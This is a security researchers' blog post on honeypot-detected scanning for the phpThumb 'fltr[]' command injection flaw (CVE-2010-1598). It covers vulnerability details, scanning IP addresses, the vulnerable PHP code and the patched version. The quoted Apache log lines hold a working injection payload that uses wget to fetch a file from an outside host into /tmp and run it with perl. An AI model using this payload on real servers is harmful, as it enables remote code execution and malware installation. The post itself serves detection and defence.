The SpiderLabs Research Team has identified active scanning for the phpThumb() 'fltr[]' Parameter Command Injection Vulnerability in our web server honeypot logs. Here is the vulnerability info as described by SecurityFocus:
| Bugtraq ID: | 39605 |
| Class: | Input Validation Error |
| CVE: | CVE-2010-1598 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 21 2010 12:00AM |
| Updated: | Nov 22 2011 07:39PM |
| Credit: | M4g |
| Vulnerable: | phpThumb phpThumb() 1.7.9 Johannes Jarolim Yet Another Photoblog (YAPB) 1.9.26 FLEXIcontent FLEXIcontent 1.5.3cFLEXIcontent FLEXIcontent 1.5.3B |
Here are some Apache access_log examples:
94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/victore/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
We have seen scanning from the following hosts:
115.178.22.206116.12.168.232161.139.195.191189.87.233.5195.248.231.180200.134.25.51206.212.253.225213.195.65.16217.79.182.3862.212.67.7770.169.147.2191.121.137.8791.121.151.15591.121.152.10591.121.160.16091.121.168.4591.121.208.19991.121.22.10791.121.3.4191.121.5.21191.121.90.18594.23.10.7694.23.19.18294.23.196.14294.23.205.18094.23.214.10194.23.216.5594.23.230.10394.23.232.19094.23.244.13894.23.27.17094.23.39.1694.23.42.12194.23.47.19894.23.61.47
By appending a semi-colon to the "blur" option of the fltr parameter, they attacker is able to execute OS level commands. Look at the phpthumb.class.php code:
function ImageMagickThumbnailToGD() {... foreach ($this->fltr as $filterkey => $filtercommand) { @list($command, $parameter) = explode('|', $filtercommand, 2); switch ($command) {... case 'blur': if ($this->ImageMagickSwitchAvailable('blur')) { @list($radius) = explode('|', $parameter); $radius = ($radius ? $radius : 1); $commandline .= ' -blur '.$radius; unset($this->fltr[$filterkey]); } break;... $this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__); $IMresult = phpthumb_functions::SafeExec($commandline); clearstatcache(); if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) { @unlink($IMtempSourceFilename); } if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) { $this->FatalError('ImageMagick failed with message ('.trim($IMresult).')'); $this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__);...}
This is then evaluated in the phpthumb.functions.php code without any input validation checks for the $command data. The phpthumb CHANGELOG states the following changes for v1.7.10:
v1.7.10 - April 24, 2011 * ImageMagickVersion() returned unknown-version for versions with hyphenated subversion numbers (thanks r34wangØuwaterloo*ca) * replace all ereg* functions with preg* equivalents for PHP v5.3.0+ compatability * Bugfix: security vulnerabilities when used with ImageMagick
The updated "blur" code now enforces both a length restriction and also uses php escapeshellarg function:
case 'blur': if ($this->ImageMagickSwitchAvailable('blur')) { @list($radius) = explode('|', $parameter); $radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1); $commandline .= ' -blur '.escapeshellarg($radius); $successfullyProcessedFilters[] = $filterkey; } break;